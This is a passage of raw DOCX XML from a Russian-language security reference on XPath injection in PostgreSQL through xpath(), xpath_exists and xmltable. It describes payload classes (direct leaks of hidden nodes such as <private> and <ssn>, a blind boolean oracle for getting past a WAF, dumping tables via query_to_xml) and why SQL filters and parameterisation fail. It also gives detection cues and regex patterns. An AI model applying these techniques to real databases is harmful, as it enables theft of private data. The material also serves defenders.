    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            name text PATH 'name',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            age int PATH 'age'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FROM documents WHERE id = :id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root_xpath</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name, age FROM xmltable(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PASSING xml_content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    COLUMNS name text PATH 'name', age int PATH 'age'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100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM documents WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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итерирует по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">всем</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> элементам XML (включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;private&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">); для каждого пытается извлечь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age</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Утечка скрытых XML-нод.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что произойдёт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A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — direct leak любых XML-нод; обход application-логики "разрешён только /public/*".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B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — blind leak через xpath_exists boolean oracle; посимвольный extraction.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C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — leak rows таблицы через query_to_xml + XPath-фильтр.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D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — массовый dump XML-структуры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xmltable.</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на SQL-keywords</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не покрывает XPath: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[contains(...)]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starts-with(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это другой язык.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на SQL-операторы (`'`, `=`, `OR`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> частично применим — XPath использует те же символы, но другая семантика. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'OR'1'='1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в XPath — синтаксис-ошибка, не tautology.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 на «опасные имена таблиц»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не покрывает XML-теги (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;private&gt;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&lt;ssn&gt;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Параметризация SQL не помогает</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — даже если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xpath_expr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> параметризован как bind variable, XPath-injection внутри строки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">происходит</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на уровне XPath-парсера, который видит уже-binded text как XPath-выражение.</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`xpath()`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> документирован в https://www.postgresql.org/docs/current/functions-xml.html#FUNCTIONS-XML-PROCESSING. Принимает любой text как XPath-expression.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libxml2-backend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> парсит XPath 1.0 строго по спецификации W3C. Полная grammar: navigation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predicates (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[expr]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), axes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">child::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parent::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descendant::</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и т.д.), functions (60+ built-in).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`PARSE_NONET`-флаг</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> включён в libxml2-binding всегда: external entities, external DTDs, network access блокированы. Это закрывает XXE-канал; CVE-2017-7484 был исторический фикс этого.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`XML_PARSE_HUGE`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — выключен по умолчанию (CVE-2021-43795). Это значит, очень большой XML-документ → ошибка парсинга, не DoS.</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8.3+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — XML type. 9.x+ — xmltable. 9.1+ — xpath_exists.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для всех функций.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`configure --with-libxml`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — PG должен быть собран с libxml2 (дефолт во всех бинарных дистрибуциях).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`xml`-колонка или `query_to_xml`/`table_to_xml`-вызов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в коде приложения.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 libxml2 — обязательная зависимость core PG.</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Фиксированные XPath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xpath('/order/items/item', order_xml)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — конкретный path.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Параметризованный root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xpath($1, xml_col)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — bind variable; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">всё равно injection-возможен</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, если $1 принимает arbitrary user-input.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xmltable для ETL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: парсинг standardized XML-документов в табличный вид; обычно фиксированная схема, не user-controlled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атака отличается: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`//`-двойной-slash в payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — почти всегда recon-tool (рекурсивный спуск). Legitimate XPath обычно с конкретными paths.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XPath functions `string()`/`substring()`/`starts-with()` в WHERE-fragment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — leak-pattern, не application-logic.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`xpath_exists` в boolean-context с user-controlled path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — boolean-oracle setup.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Контекст вызова</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: legitimate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xpath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обычно SELECT-only, не вызывается из API-эндпоинта с user-controlled expression.</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8.3 – 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — XML-тип.</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9.1 – 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — xpath_exists.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10 – 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — xmltable.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3.8.5 (XML mass dump)</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query_to_xml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database_to_xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> дают всю БД в XML. 3.11.3 — атакует XPath над этим XML. Связка для massive recon.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — XPath-syntax-error даёт детальный error: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: could not parse XPath expression: "..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Через ошибку leak текста payload — но не результата subquery (XPath не интерпретирует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Payload B — XPath-based boolean oracle. Альтернатива классическому SQL boolean-blind для случаев, когда тот заблокирован WAF.</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 (OOB)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не пересекается</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: XXE в PG закрыт (XML_PARSE_NONET). OOB через XML невозможен.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3.11.2 (jsonb path)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параллельный класс DSL-injection. 3.11.2 — JSONPath; 3.11.3 — XPath. Идентичные категории атак (path-traversal, recon, blind), разные DSL.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3.11.4 (Array)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xpath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает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обращение к элементам через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array_to_string()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — пересечение с array-handling.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регекса для XPath-в-runtime-SQL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bxpath\s*\(\s*['"][^'"]*['"]?\s*\|\|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\bxpath_exists\s*\(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\bxmltable\b</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3.11 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.11.md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XML Functions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — xpath, xpath_exists, xmltable.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XML Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — type-семантика.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W3C: XPath 1.0 Specification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — grammar.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Security: CVE-2017-7484</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — historical context для XXE-блокировки.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Security: CVE-2021-43795</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — XML_PARSE_HUGE контекст.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OWASP: XPath Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий класс атак.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XPath injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — практические payload-ы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.11.4 Array vs scalar: ANY($1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код — см. 3.11.0.</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PostgreSQL имеет первоклассную поддержку массивов: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jsonb[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
